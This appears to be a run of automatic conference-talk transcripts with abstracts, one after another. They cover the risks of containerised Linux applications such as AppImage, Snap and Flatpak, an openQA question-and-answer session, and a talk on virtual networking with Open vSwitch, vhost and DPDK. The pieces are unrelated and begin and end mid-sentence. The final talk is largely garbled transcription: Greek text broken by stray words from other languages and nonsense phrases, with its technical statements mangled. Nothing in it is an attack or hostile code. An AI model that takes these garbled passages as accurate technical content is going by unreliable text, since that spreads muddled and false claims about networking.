do at OpenSUSE all the damn time and it takes all of us to do it. If you don't get your head around that, your users need to expect crashes. So is it hopeful? Is it hopeless? You know, well, you know, you talked to flat pack people like this, oh, no, we've solved it. You know, we've got these run times or on the snap side of things, you know, we've got these base snaps. Well, those base snaps, those run times just end up being some second curated middle distro. It's middle where for the containerized world. Cool, fine. But you haven't solved the problem. You've just moved it into a different context. It's still another distribution. You're still having to have distribution engineers worry about this stuff and curate it and secure it and patch it and maintain it. Maybe it isn't a real solution. Maybe a real solution is actually figuring out a way of commonly agreeing between us, the distributions as a platform, the application run times as a delivery mechanism and hopefully even the developers on common, I use the word standards here, but let's say common agreements of, you know, what can you expect from your base system? What can application developers expect from their run times? So people can go into this and we won't just have random crashes when you install your app image or your snap on an open Susan machine and it doesn't deliver the kernel the way it's expected or the library is the way it's expected. And until we do that, the compatibility problem isn't really going to be solved. The portability problem isn't really going to be solved. But what about pace of changes? And, you know, well, yeah, what about it just working? Well, back to the window side of things. This is what Windows did. This is very, very similar to what these technologies are doing as well. Is history just repeating itself? Because when you're delivering these libraries in there, it's going to be a security nightmare. Maybe not in a practical sense, you know, because we are talking about putting these stuff in jails and, you know, some kind of isolation. But to be honest, when it comes to these, you know, these bits of isolation, it's a firewall. And I don't like the idea of trusting a firewall with my system security. I like a firewall being there when everything goes wrong and it's my last line of defense, but it's not my first line of defense. I want sensible engineering as my first line of defense. And therefore, I kind of forget about the isolation entirely and want to make sure that someone is taking care of the security of the libraries in my bundle and assume that at some point someone's going to escape the jail. There's no answer for that right now. There's no clean answer for that right now. Or there wasn't a week ago. Same with the maintenance side of things. Who's going to be patching these libraries in there? Who's going to be making sure that those libraries are moving forward? Who's going to be making sure that what I've installed is actually legally allowed to be on my machine? Who's going to make sure that the GPO is correctly being used and cited in there with my LGP stuff, for example? But it's okay. Store adventurers are still going to be happy because all these bundles are going to be using up more disk space. And then this is where my slide decor starts going out of Kilda because I was going to then talk about how we need to start conveying these responsibilities to the various maintainers of App Image and Flapback and Snappy and start talking about how are we going to get this message out there. And I was going to be talking about considering ABI changes and how do you rebuild bundles when ABI changes happen. And I was going to be talking about testing all of that. And I was going to be talking about the security maintenance issues. And I was going to ask the question about, you know, what are we going to do? And I was going to suggest a few things as well. But it all went horribly, horribly wrong because of the Open Suicide Conference. It's all changed. My question no longer is what are we going to do? It's actually what has been done already. And, well, I was going to change the title of this talk because, you know, from being a real bad skeptic of all these technologies, from what's been done, I now love App Image. I really love App Image. Because, well, OBS now builds App Images. Our build service now can take our packages that we have in there for Tomberwee to leap in for everything else, even our develop projects, and build App Images from that. So all those problems about the sort of security compliance, the security auditing, license tracking, dependency tracking, figuring out how to rebuild stuff, when to rebuild stuff, all these problems that we'd already solved in the distribution space, the App Image guys by working with us have now solved it in the App Image space as well. And, you know, we can host them on the build service too. So we have even, you know, changed the context of how you can deliver the software to the users. And we've managed, you know, the OBS team, we've managed to do all of this without impeding App Images' strengths and flexibilities of just being a nice, easy, lightweight of doing this thing in their hands of users. It just gets there. It's easy to deploy, you know, on single click run, it unpacks, it runs. This is really exciting. This totally changes my outlook on all these technologies because suddenly I don't have to be a skeptic anymore. I trust the build service, I trust the tools we have there, I trust the processes we have there. And it makes both sides of the equation more interesting to me. Just a few ideas that are kind of bouncing around my head since I heard about this two days ago. I want to see if we can do something like open SUSE a leap with App Images with user space applications being built from the tumbleweed sources. Because the build service can do that. We can build tumbleweed sources for leap. We can wrap that up in an App image. Last year I had this long one hour ranty talk about how I hated developer projects. Now we can kill them in the sense of killing the publishing of the, we still need them for building stuff for tumbleweed. But if we do this, users will be able to hopefully get the latest version of LibreOffice on their leap machine without having to change everything on their leap machine. That's really cool. We announced earlier this week open SUSE cubic, which is currently very much targeted for the Docker and Kubernetes world of a very, very stable atomic file system, atomic distribution with transactional updates on the base system. Well, now we have this. If we shove a graphical environment on there, maybe a nice tightly polished one, something like GNOME, and do all of the user applications with this, suddenly there's an option of an open SUSE Chrome OS style thing, a nice simple appliance for your grandma, which is something, well, when someone talked to me about that just last week, I said, yeah, good luck, have fun. It's crazy. It would take tons of people, tons of hours, and it's never going to happen. Now I can see one or two maintainers taking what we do in the build service and taking what the app image guys have done with us, and being able to knock that out in a couple of weeks. That is awesome. Admittedly, I'm not going to use it, but it's awesome if someone wants to take and use it. There was a talk today about the package hub and all the stuff we're going in package hub. Hopefully no one from SUSE sees this part. I have a bit of a mixed opinion of package hub because it's really exciting me that we're delivering open SUSE packages to enterprise customers, but at the same time, the way we're doing it is really similar to how tumbleweed back three years ago used to be, where SLEE is a really nice stable base and we keep on putting new versions of everything into package hub, rolling along the top of that. With old tumbleweed, we learned eventually that gets too big and too unwieldy and it starts getting a little bit breaky. It hasn't had that problem with package hub yet, but that's a risk if package hub just keeps on ballooning. For the user space applications, at least, the desktop applications, this app image stuff gives us an easy way of insulating that problem. We can actually define the scope a little bit better, start using the app images there, maybe start delivering app images to SLEE via package hub. Solve the same problem, does it in a slightly more sane way and uses these technologies to solve real problems that we would otherwise run headlong into. But I'm not finished because this is just app image. I was thinking, what's left? Well, snappy, flatback, sorry. With this now, you're not just part of the equation, you're behind. App image now has a better build story than you do. They've got a stronger compliance story than you do and they've got a more straightforward user experience in different distributions than you do because you still haven't got snappy in tumbleweed. Even if you ignore the technical stuff and you want to argue the details with me, they're kicking your ass when it comes to working with others because it's not just the fact that you're both here, it's the tone, it's the style, it's the way they've really got their hands dirty and messed around with the build service. Please be more like app image. It's been so fun working with them and seeing them change my mind and seeing us change their mind a little bit about a few things. We've got the tools, we've got the talent. Please work with us because I think we can do really exciting things in this space. But it's going to need to work in the kind of way that these guys already are working with us because it's just really exciting doing it that way. And it's not all good news or it's not all bad news for you. There are still problems across the entire thing. Dependency hell is still on the horizon. All of these tools still have very limited or no way of really solving this issue of what's coming from the base system. There's still assumptions being made there. We need to get together. These tools need to get together, the distribution needs to get together. And we need to discuss common standards and design common standards so everybody can go into this equation with simple ideas of what's going on there. Without that common understanding, application developers will just find frustration and users will just find crash stuff and distributions will just keep on doing what they're doing at the context they're doing. And then we'll actually miss out on cool opportunities to use this stuff in the way like I was talking about. And security, sandboxing, the app isolation side of things is a complete mess right now. Everybody has cool ideas and no one's finished implementing anything. The app image side of things, well, I kind of understand that because they've gone into this with the approach of use fire jail or whatever the hell you want. That's cool. But whatever the hell you want to be a little more defined than that. SnapD obviously has the app armor side of things. We love app armor, but your patches aren't upstream yet. And I know yet that's cool. Fixing that. But let's get that done. Let's get that in. Because if I had my way of doing my way, I'd like to see app armor kind of become the single way of doing this. I think it makes more sense. I understand that armor or more than I can understand bubble wrap and what they're trying to do there. I think that bubble wrap stuff is a little bit too desktop application oriented, which is cool for desktop applications, but there's scope here for using it in other wonderful ways and IOT and stuff. So let's see what we can do about getting app armor in there, polished up, do it all the way. And with that, I just want to kind of say thank you. I mean, this is becoming a really good lesson for me of two months ago, I was screaming that I thought the world was ending and this would never work out all right. And I've become a convert. I want to help make this better now. So let's just get onto it and does anybody have any questions? Anybody? Go on then. Obviously. I was hoping you did. So I'm curious about security and licensing compliance you mentioned. So you say you have an app image built on OBS. What does actually check that maybe that app image is built from a Git tree somewhere else that you're still compliant that the Git tree does not contain stuff in a different and compatible license and it doesn't contain a bundled copy of a library that has security vulnerabilities? You're technically right. I mean, yeah, if someone's taking an OBS project, a random home OBS project and building app images from that, there's no magic license solution there. But like we were talking about earlier this week, like my other talk from Friday, if you look at what we're doing with tumbleweed, you've got a pool of software and tumbleweed where we are keeping up with upstreams. Heck, we were just about to publish a new GCC7 version that we did while we were here. The pace of changing tumbleweed is fine. So you've got this huge pool that is audited, that is there, that is done, that's keeping up with upstreams. So if you're building your app image based on tumbleweed packages, you've just got to worry then about your tiny little diff, your little part there, which means all of the other dependencies you're feeding into that, they've been audited, they've been checked, they work in the sense of tumbleweed done. Completely agree and snaps have exactly the same thing with the build snap. I talked about it. Yeah, but you're doing exactly the same thing with Ubuntu and only Ubuntu. Well, it's still we're doing it and exactly the same as you do. Yeah, but with the build service way, you can do it with everything I just said with tumbleweed and you can do it with Ubuntu and you can do it with that. And we're going to get there. Yeah, but you can do that your way or you can just copy what they didn't do with the build service. No, because the problems are not like that. The problems are technical below the stack. And it's not a problem of building, you can build it, you just can't run it yet. Once we get to the running, you can build it on top of anything and run it. And that's fine. So we have the same goal here. There's no disagreement. Okay, I'll believe it when I see it. Any more comments? Questions? Cool. So there's two issues actually don't really see solved yet. So first of all, you still end up with a certain amount of size, right? Yeah, because you need redundancy. And of course, one thing that always concerns me is the laziness of developers because they start to rely on compatibility or outdated libraries. So especially if you have something large like say, framework X, which depends on a lot of libraries, then you have a large footprint, which becomes outdated now. I don't want that to happen with stuff like an open SSL, for example. What do you think about that? It's a perfectly fair point. It's a perfectly fair problem. And the answers are exactly... I don't see that problem any different in the containerized application context than I do in the distribution one actually. We suffer that same pain. I'm kind of hoping that getting distributions around the tape, distributions and projects around the table and the kind of common framework idea that we're sort of coalescing might give a little bit of a push to help drive that problem away a little bit. Just like it did with like KDE and Leapneeding and LTS release and KDE, making a commitment to that. That's how they're going to do that and solve that problem for us. Yeah, it's a very real problem. We never really solved it on the dependence, on the distribution side of things on our own. This actually makes it potentially a little bit more... It gives us a second chance to do it right this time, hopefully. There's a question there. Yeah, if I will be developer of... I still feel that Android kick our ass because it's so much easier to develop for Android. And they have the same problem. They have, let's call it distributors, which is actually hardware vendors that provide their phones. And they have some stable base, which is versioned Android. And yeah, of course they have problems with security and such stuff, but I still feel that from developer point of view, it's much easier to develop for Android than any app images. Why? What's the difference there? Because ultimately, an Android app is just a bundle of a whole bunch of dependencies. It might be easy... How would that be easier, both... The question I've got to get to you then is, how is that easier, both getting the application app in the first place and then how is it easier maintaining it? Yeah, one part that's easier, they have a common base. They can easily... It's back... Somehow back what compatible. And you can say, I support this version of Android or newer. And it keeps working. But yeah, I think finding such base in Linux is, as you mentioned, in the standard base is basically missing. And there's a lot... Much more stuff in Android that's common than in Linux, which is... Yeah, that's because you have to bundle much more in Linux than on Android. Yeah, I can't argue with that part. That's why I think we need this. Because I think the problem with the Linux standard base is the scope was too broad. It always was, trying to define everything at every level of every bit of the stack. The nice thing with these technologies is they push that problem down to a certain amount. I mean, Snap tries to push it down to the kernel. App image tries to push it down quite low as well. Flatpack keeps on changing its mind because then the runtimes move the line all over the place. But at least the line tries to get defined further down the stack. So if we just figure out where that line is and define a common base below there, common... Let's say if it line gets drawn near the kernel, basically common standard configs of the kernel. What config is likely to be there? What is an LTS... Are we going to follow the upstream LTS kernel and move along at that kind of pace? Just so you can tag that with a version and say, okay, I'm supporting container-based version blah, and then you get that solution. You get that situation you have with Android. I think we need that in the Linux containerized app side of things as well, totally. Yeah, and another part that sucks for me as developer is that we don't have a common place where to distribute such stuff. They have the Android Store, how they call it, and you just upload it there and you are fine. Every Android user, even if it's from different distribution already having it. And we still miss it in Linux for many years. Yeah, I... Given the nature of the open-source word, I don't think you will have a single place. I mean, you might have a dominant place because someone's going to win the popularity war, but whether it will be a single one, I mean, even Snap has multiple store options already. OBS is now another one for App Image. There will be fragmentation there. I'd love to see a way of pulling it all together somehow because I think that will help in the long run. But that's a problem for the future, I think. Yeah, something we have to worry about, definitely. Yeah, so what I want to say is that we are still behind Android. We're still behind Android. No doubt about that. From developer point of view. And I think user point of view is also behind Android. And that's something that I... That's a drum I think I'll keep on beating because I think if we can get a bit more commonality between these different tool sets, it makes that a little bit easier to catch up with where Android are, makes it a little bit easier also to be honest, the kind of motivation behind this. I can see how this makes distribution's lives easier, less stuff, less to maintain. And we're all lazy. So I can see how we can actually use this to change everything in a rather nice way. But it's only going to work if we kind of find ways of applying focus to that and coming up with some common standards and then seeing how the technologies actually shake out in the long run. Cool. Any more questions? No? Okay then. Thank you very much.
Containerised Application technologies like AppImage, Snappy and Flatpak promise a brave new world for Linux applications, free from the worries of shared libraries and dependency issues. Just one problem, this is a road long travelled before, such as in the application dark ages of Win32 applications and DLLs. And it worked out so wonderfully there... Do we risk a future where, like the resurrected dinosaurs of Jurassic Park, this family of applications will break their containment and start eating our users? This session will try to present a fair argument about the situation, frankly discussing the benefits promised by these technologies, but highlighting the very real issues and risks their widespread adoption could, and in some cases are, already bringing to the table. The talk with cover the promised benefits of application containers, such as AppImage, Snappy and Flatpak. It will detail the empowerment of developers who use the technologies, the ability for upstream projects to have a much closer role in delivering their software, and the benefits that brings to both the upstream projects and their users. But as a counter to those benefits, the session will detail some of the risks and responsibilities that come with that technology. The complexities of library integration, the risk of introducing new forms of dependency issues, and the transference of responsibility for those issues, plus security, away from the current Distributions delivering upstream projects towards those upstream projects directly. As a conclusion, the session will start to ask the question, what the hell should openSUSE do about this mess? How much can we help fix it or mitigate the problems? How much do we want to be involved in that new world?
10.5446/54462 (DOI)
So, the next topic is actually just question and answers around OpenQA or about the community or about the developer process. I have not prepared anything so, I didn't expect the big, the big, the whole, but anyway. Actually, I would like to, I have one question myself about this and this actually straight to Kulo about the tool development process. Could you a little bit describe how you, and your new features, how to fix bugs in the OpenQA community and on the SUSE side I can add myself. You want to start? Yeah, we have GitHub projects, like, oh, GitHub OS auto-inst was, and in that project we have all in that organization as GitHub calls them. We have OS auto-inst for the back end stuff. We have OpenQA for the web UI and user management stuff and we have OS auto-inst distry open SUSE for the tests and for open SUSE we have also the needles there. It's called OS auto-inst needles open SUSE. And for all of them you can create pull requests and we will comment them and review them and we have, for OpenQA specifically we have running a unit tests on Travis that will report a request on the web UI itself. Okay, thank you. Are there many people outside of SUSE? How big is the OpenQA community? What would you say? Last time I checked there were 40 contributors to all these repositories. Mostly the largest contributions happened to the tests, obviously, because that's what the OpenSusE community interests most. For OpenQA we have... Can I just... What? Use the microphone please. I think we have like two or three maximum contributors externally to the code base. So the most is an intern in SUSE? Mostly it's internally at SUSE and we have Fedora guys providing fixes they need and lately we have someone from Aachen who's contributing. Okay. Maybe Dominic wants to share a little bit about how they use it for Tumbleweed and Leap? Yeah, I can give it a try. Of course at Tumbleweed we are heavily relying on OpenQA. For us the important part is actually knowing what's happening and having a direct channel to the developers which we do using IRC. And I think generally it works fine. People are reactive. Sometimes it blocks a snapshot because something broke. Last week I think we had something but nothing that takes forever to get a fix in. Okay, I can share something how we use it actually for SUSE in production for testing the Slesv version. We have actually two cycles of OpenQA. First we have a so-called staging project where the developers can submit the packages into OBS and then there is a kind of an image where we put together to do a staging project where we set a user bunch of tests to make sure that nothing breaks the image and then this old goes into the build server and after build is created for Slesv we do a full cycle of QA with a lot of different test cases in different areas, functional, kernel, migration and so on. That's how SUSE is using it for production QA. Are there any questions from anybody to the tool or to the development process? Anybody interested? Okay, you use some graphic library that can detect... Sorry? Yeah. You use some graphic library that can detect road signs and when you have like two pieces of text which are black and white so high contrast and the outline has a few shades of gray different because of different hinting. You get 34% match. How does that... Pass the test? Pass the test or what do you mean? No, it probably doesn't because it's slow match but actually the text is very similar and the difference is only negligible compared to the contrast of the whole image. How does it... How do we do this? Okay, there are two things. First of all, this percentage depends on the size of the needle. If you have a big screenshot then the percentage gets kind of blurry. If you narrow down the area and the needle is pretty small then you have more failures. It's the same issue. The other thing is we can change the percentage of where we... When a test case fails or passed. So we could say it was 90% test case passes or fails. Is that correct? Cool? Yeah. So we kind of have some space here where we say there's a certain percentage. It fails or passes and these two rules have to be applied to every test case to every needle and then make sure that the test case passes or fails. Yeah, of course. Is that answer your question? There is some guideline that needles that have lower than 90% are completely useless because... I think that the percentage is fixed. It's with 90% or something like this. Yeah, but what I am asking is how do you apply that algorithm that detects wrong signs which is like really fuzzy matching because the road signs can be rusty and the cameras are blurry and all that. You get black and white text which is high contrast and you get a small outline only a few shades of gray different and it's rejected. Because we want to. This is how we want to it because there are screens for example where we... Where the underscore on the text in the UI element specifies the shortcut that you have to use. So you want to assert that if you press alt F the file menu opens. So you have to make sure that the F is actually underscore before you press it which means there's a huge difference if the F is underscore or the L and that's why we have to be very precise on the matching. And as Marita already mentioned the needle can be tuned to be forgiving but as most of the times the product does not change its font randomly. These problems that I just outlined only happens if someone decides to change the font and then all the screens create this problem but not in general. Okay. Any other questions? Yeah I have one. You mentioned that OpenQA can automatically write bug reports. Is that correct? Can write what? Automatically raise bug reports. No. No. No that's not true. Actually you have a test case and the test case fades or passes for different reasons and then the OpenQA engineer has to go and investigate why this red case is red or green. One reason could be there is a new feature in the product and the test case has to be adjusted. One thing could be product has a bug or failure and yeah or somebody broke the test case, somebody broke the back end and so on. So there are two related issues or product related issues and this has to be done manually actually. The engineers have to check the red, the red, the failing test case and we have some methods here so that you can add a tag to this test case saying this is a bug and this is a product issue and then this has to be investigated for so. But this is actually done manually. So in other words you have a change control board? Yeah actually I wouldn't say change control board but it's actually the main work of product QA at the moment. So we've at QA when we test less we have this test automation framework. This is one part of our department's work and the other part is really doing a review of the builds of the test cases. So we have implemented several groups who are doing a daily review or regular review of the builds, mostly one build a day and they really look into each test case, make sure that we invigaste it correctly and also make sure that we don't have false positives and all this kind of stuff. This is actually one of the two main jobs that we do at product QA at the moment. Do you also test GUIs like KDE? Do you also test GUIs like KDE? Yes we test the operation system, the installation and application on top like KDE and GNOME as well and other applications. So how do you handle things like when KDE crashes and Dr. Konke kicks in, how do you handle KDE? How do you handle... I mean if it's a KDE thing we report a bug. If it happens occasionally we kind of retrigger the test cases but make sure that we track all this and report bugs if it's really on the KDE side. The tests have a post fail hook. So if they fail they will try to gather some logs to upload to the system so that you don't have to rerun the test manually but have the logs right away in the system so that we can provide the link to the failing test right to the developer and he has all the logs available. They crashed down... In most cases not but other logs. Okay. Any other questions? Any other things? What time is it actually? I have some other questions with these tests. I run in these problems with different fonts as well and when I look at the difference if I see that there is no significant difference could I like create a difference? Could I like subtract the outline from the area that is matched so that I get only the parts of the letters that are fully... Yeah. I mean you can narrow down the needle to the area that you're interested in and make sure that you really have needle and image comparison in this area and you can exclude all the other stuff that you're not interested in. Was this a question? Or... Like there is text and the difference is the outline because there is different hinting or slightly different font. Maybe it may be... If I run a different terminal it may be bold or... Okay. If you have a change of the font like it's bold or not it really depends on this percentage. If the percentage is matching 90% or more than you have a pass if not it's failing. Well it will not pass because the difference is too large but I would like to... I would like to comment what is available for investigation in the web UI currently. So what we do have available is the screenshot as it happened and the reference screenshot that he wants to compare with and so what you can do is you can take these two images and calculate the difference. It's not done automatically because it's not such a common case to have a difference in hinting or like a little shadow or blurry edge around the fact that we would say we would need this more often in testing to help but I think it's quite easy and feasible to do because the data is available. And also what is reported is the... This value of match is it a 0% match like it could not try to match this anywhere or anywhere in between like as we saw before like a 30% match or 60% match where we say like yeah probably the right content is shown but it differs let's say in a single character or maybe the hinting as we mentioned. Okay, thank you very much Oliver. Any other questions from anybody? I have one question because I just saw on the slides to my own surprise that we have a question from we have QA version 4.4. How do we plan this version numbers? I'm really surprised with this myself. The 4.4 I think was done two months before last year's OpenSousa conference and during the OpenSousa conference we discussed if we want to have 4.5 and we decided to wait for more features to be done and then so it's 4.4 and then a time... Okay, so my follow up question here. Do we have something like a schedule for this? Does the community provide a schedule or is it only an ongoing discussion on some daily stand up meetings? And if not would it be a good idea to implement something like this, more formalized schedule for releasing or so? Possibly. No, we don't have any schedule and we don't do any releases at this point because the main reason we did releases initially was because Fedora used the stable version that we provided and they don't do this any longer. So there's not any appealing reason to do releases at this point. And Olly is moving more towards having a rolling release inside of Tumbleweed. But having increasing diversion from time to time would make the message clearer that we're developing this thing and that's not stale. But other than that there's no role. So the idea is more to move towards a rolling release and this is already discussed in the development team or under investigation. So currently what we have in the GitHub repository of Oathaudience as well as OpenQA is, let's say, on a near daily basis, a new features added and fixes merged. And all of this is in a releasable state because currently the tests that we run on each pull request is ensuring that the full web UI can be started and tests can be triggered. On top of that within OBS where we build packages for OpenSuser and Slee, we are also incrementing diversion numbers, so it's 4.4 and then some suffix to that. So each version number of course is unique. And what is currently done is that we have tests of OpenQA within OpenQA. So OpenQA is also testing itself and the idea was to use the outcome of that in an automatic way to create a submission to OpenSuser factory so that every release of that, if it passes its own test, will also be created as a submit request to provide a new version within OpenSuser factory and therefore OpenSuser tumbleweed. And also we have it in Leap, but then in Leap we are probably trying to come up with a more stable way to releasing it. Okay, thank you very much. Actually, if there are no other questions, I can recommend the test case beginner training for OpenQA. So some QA engineers will show you how to write test cases in OpenQA later today in the workshop area. I think it's at four o'clock or something like this. Four forty five. Yeah, okay. Okay, Santi, do you have something against that? No. Sorry? It's four thirty. Okay, so for thirty, Santi and Matias and Nick and Rodion sitting there with the nice t-shirts, we'll do a test case beginner training if somebody is interested. Thank you very much.
Let's follow-up on Coolo's talk, dicuss technical details, ideas, etc. openQA is an automated testing tool, capable of full system, console, and graphical application testing, written in Perl. This session wants to bring together the openQA backend developers with testcase writeres and users of openQA to discuss ideas, bugs, improvements and so on. Newbies to openQA or any interested persons are welcome to join and share ideas, questions, etc.
10.5446/54463 (DOI)
shots with bots, served unique features of our project. Σήμερα θα δούμε πώς θα χρησιμοποιήσεις αυτές τις τεκνολογές, πρώτα, για να προσπαθήσεις τη δημιουργία σας. Θα προσπαθήσουμε να το ανοίξουμε. Θα ανοίξουμε να ανοίξουμε και να ανοίξουμε πολλά πράγματα, για να σας δείξουμε πώς αυτά τα τεκνολογία εμπροσπαθούν. Ξεκινάμε με ένα μπροστάδιο επίπεδο για τη δημιουργία. Θα μιλήσουμε μπροστάδιο για το OpenVe Switch και το DBDK. Και πάνω από το μήνυμα θα προσπαθήσουμε ένα δημιουργείο, να ανοίξουμε όλες αυτές. Πραγματικά, σε δημιουργία, έχετε το υπροσπαθείο, που πιστεύετε να εμπροσπαθείτε το προσπαθείο, το δημιουργείο και το μικρόνυρο. Και όλοι οι υπροσπαθείος έχουν ένα δύο δεύτερο πρόσπαθό για όλες αυτές τις πρόσπωτες. Είναι ένα εμπροσπαθείο εδώ, ότι σε ένα σημαντικό σύστημα, ένα δυνατό πρόσπαθο πρέπει να έχετε δημιουργείο για να έχετε δεύτερο πρόσπαθο. Έτσι, δεν μπορεί να είναι χρησιμοποιημένος με δυνατό πρόσπαθο. Αυτό είναι πολύ εξαιρετικό και σκληρό, σε τέτοιχες προσπαθείες. Και η καλή εξαιρετική εδώ είναι ότι μπορείτε να δοκιμάσεις ένας δυνατό πρόσπαθος. Αν όχι, όπως μπορείτε να δείτε εδώ, πραγματικά έχετε δυνατό πρόσπαθο να πιστεύουν ότι έχουν κάτι στους αρκετών. Αλλά, στην πιστήση, είναι ένας δυνατό πρόσπαθος που είναι να εμβουλήσει όλα τα εμπροσπαθείο. Βέβαια, όπως είπατε πριν, το πρόσπαθο εδώ είναι ότι υπάρχουν δυνατό πρόσπαθο στους τεχνολογικές, like Qoimew, VMware, που εξαφαλούν δυνατές. Για παράδειγμα, ένας δυνατό πρόσπαθος μπορεί να εξαφαλούν έναν δυνατό πρόσπαθο, έναν άλλο μπορεί να εξαφαλούν έναν δυνατό πρόσπαθο. Πρέπει να χρειαζόμαστε δυνατές στον συνεχασμό της εργασίας. Αυτό είναι πολύ δύσκολο για τη δυνατό πρόσπαθο. Βέβαια, πρώτα, ήταν ένας δυνατό πρόσπαθος για να εξαφαλούν δυνατό πρόσπαθος για τη δυνατό πρόσπαθο. Αυτό είναι ένα σχέδιο της εργασίας, πρέπει να εξαφαλούν για τη δυνατό πρόσπαθο. Βέβαια, είναι ένας δυνατό πρόσπαθος, που είναι πολύ δύνατο. Αυτό είναι πολύ δύνατο, πρέπει να εξαφαλούν για τη δυνατό πρόσπαθο. Βέβαια, είναι ένας δυνατό πρόσπαθος, πρέπει να εξαφαλούν για τη δυνατό πρόσπαθο. Πιστεύuliflower,�Ji,onsin scor, ντομιδότητα οι μάθεςunking. Και το ζωής της Корνράφροτης. και μετά από την τάμπιτρα, και στην τεχνική τέτοια είναι η καρνότητα που κατασκευθεί την συμμετέρα. Ωπιστικά δεν μπορείτε να χρησιμοποιήσετε αυτή την προσδοσία. Η ιδιαίτητη τραγία θα είναι για το συμμετέρα της εργασίας να κατασκευθεί την τραγία ευκαιρία. Λοιπόν θα δούμε πώς να κάνουμε αυτή. Μιατηνή πλήthing που το διοφαναγεί στην εργασία είναι sesameλλs o darumδρια anyways. και ένα άλλοaksi hides τους βρίσκεςBACK εγγυ Zhi GAn πώς φέριακε να observation όταν πιστεύσεις από το καρνέλ να χρησιμοποιήσεις. Έτσι, ένα πράγμα που πρέπει να κάνουμε είναι να χρησιμοποιήσεις το νέο των κονταξίων. Μετά από το Virtio, το Virtio ήταν υποχωρήσει. Και αυτό ήταν όπου το VHOST was born. Βέσικα, VHOST είναι το Virtio backend που είμαστε συγκρατές. Τυω Гос monarch έπλεσα το Kernel όπλα στο agricorman. Όifiqueφι, έχεις δεν δίνει πολύ<|pt|><|transcribe|><|pt|><|transcribe|> Οιöl Watson voltou a magnetgano e despag32 Rashid Cs Aiversmont.<|cy|><|transcribe|> Este vedchanging serie fierce. Έτσι, many thanks to Facebook, SEEZ who punct here to even a great reader, we show here its notch and στο χώρο του χώρου. Δεν υπάρχει πιο χρήμα για να έχουν κονταξίδες για να δείξουν δίκαιο από το βερτσόνου ασφαλή. Επίσης, υπάρχει ασφαλή, επειδή η χώρου χρησιμοποιήκε να πρέπει να δείξει δίκαιο στον εξαλή στον εξαλή. Υπέρα να κάνεις αυτό, πρέπει να δείξεις το βαμβάνωνο από το χώρο του χώρου. Έτσι, έχω σέντον αυτό. Είμαι σύντομα να μιλάω ένα μικρό μπροστάκι για να μιλάω ένα λίγο από το βαμβάνωνο από το βερτσόνου ασφαλή. Είναι βαρτσόνου ασφαλή, που σημαίνει πολλές τεχνόνου ασφαλές στην ασφαλή εξαλή, like το ασφαλή. Μπορείς να κάνεις βιλάν, να σπανεί το πρότακο, αλλά και να μπορείς να είχα τα πρόταρια ιτίταρχο και οικογον altogether. Βλέπεις ότι καrone Photoshop υπάρχει στο ♥ δηλαδή και Kapfer Operator, και πράγματι, ρωτ Career here, εντάξει, έχεις oyunudo, αλλά και είναι δηλαδή'mεζο ότι αν συγχ Quria ήησα για να δημιουργήσουμε και όλοι. Έτσι, μπορείτε να κάνετε τα ίδια με OpenFlow. OpenFlow είναι υποσχετικός για οι OpenVsweets και πολλές αρχές εξοδοσιακές. Έτσι, είναι στους οδηγιστικές στάνταρες για να μιλήσουμε τα εξοδοσιακές στις τρεις. OpenVsweets έχει πολλές δυο κομπονέντες. Τα δυο κερνόδια είναι η κέρνωσης και η χρησιμοποιή. Βασικά, η χρησιμοποιή, η δυνατότητα και η λογική και η πλαιοδοσιακή είναι η χρησιμοποιή. Η χρησιμοποιή είναι όλοι η πλαιοδοσιακή. Ο πρώτος δυνατότητας που φτάνε στην OpenVsweets πέρανται στο χρησιμοποιή. Η χρησιμοποιή γνωρίζει τι να κάνουμε με τη χρησιμοποιή γιατί χρησιμοποιήσατε OpenFlow ή κάτι άλλο για να προγραμμήσει τη λογική πραγματική με τη χρησιμοποιή. Από αυτή, τα δυνατότητα πληρώνουν σε το χρησιμοποιή. Δεν χρειαζόμαστε να δημιουργήσουμε το<|hy|><|transcribe|> το kernel user space bender anymore. The kernel module communicates with the user space application through netlink. So the user space application can always change the cache or invalidate the cache or update the cache as necessary. For most of the things that you do with virtual machines, openVSuite can be considered a drop in replacement της Linux Bridge, λίγος να μεταξύξεις όλα τα Linux Bridge με OpenVsuit και όλα τα πράγματα πάνω λίγος διότι λαθόμαστε, γιατί το δημιουργείο για OpenVsuit είναι να μεταξύξει σαν ένα σχέδιο στήριο. Αυτό εδώ, as we see, there is again the problem of context switches because all the data plane is in the kernel. So every time we send a packet from the virtual machine to the external world, then we need to cross this boundary. So one may think that it could be helpful to move all the data plane to user space to avoid this latency. However, this is not always simple. Implementing a data plane in the user space could be very complex. Usually there are quite a few bugs there. If you move the data plane to the user space, then again somehow you need to talk to the real hardware which is normally managed by the kernel. Then again you have to cross the boundary, which is not acceptable if you want to have a line rate performance. Maybe you've heard of PCI pass through in the past where you can assign a real hardware to the virtual machine. So in PCI pass through, for example, you can assign a graphics card to the virtual machine or you can assign your network card to a virtual machine. This normally works, but there are a few problems here. If you do that, you cannot use this device in your real host and you cannot use this device within any other VM. The relationship here is exclusive. One VM per device, which is not very cost effective. You could have 12 network cards and 12 virtual machines, but this is not normally the best way to do it. Fortunately, hardware progressed over these years and software followed with the virtual function input-output. In this case, the hardware exposes virtual functions. What this means is that you have a very normally very expensive network card where the functionality of the network card is being exposed in virtual blocks. Then you can assign these virtual blocks to a virtual machine. You have one network interface and perhaps 12, 32, 64 virtual functions. In reality, you can have 64 virtual machines sharing the hardware. They talk to the hardware directly. There are no intermediates anymore. They do stuff like DMA. This is also what is known as SRIOV. If we make use of this technology, then we can effectively move the hardware to user space. If you logically think about it, because now the user space can use the VFIO protocol to talk to the hardware directly. There is no kernel development anymore. There is one famous user of this VFI virtual function IO. It is VhostUser, which is a dpdk. Nirmally, we will tell you a bit more about it. What is the problem? We were talking a second. The previous solutions always talk with the hardware. We could really improve the performance if virtual machine can directly talk with the hardware, rather than go through kernel. To solve this problem, we have something called dpdk. Second. What is dpdk trying to do is... It is a library that we could use for receive and transmit packets. It just gives normal APIs to receive or even transmit or any networking related work. The normal programmer can use those APIs to write any sort of software router or software switch. Another thing dpdk does is try to use all the architectural features to improve the performance. We will see. Why we really need dpdk. This should be the first slide I should talk about. All the nicks these days are really moving really fast. We have 100 mbps and now we have 100 gbps. For 100 gbps, if we want to receive a packet of 1.5k, we have only 123 nanoseconds, which is really tight. If we really reduce the frame size to 84, for even 10 gbps, we have only 67 nanoseconds. To compare it, let's say we have a 3gb CPU, which means 200 CPU cycles. But even if we have single cache miss, it might take 32 nanoseconds and then in case of 10 gbps and a very low frame size, we might just one cache miss just eat up the half of the time that we have. dpdk tries to solve all those problems using... What it does is it uses spalling. Generally kernel, everything it does is 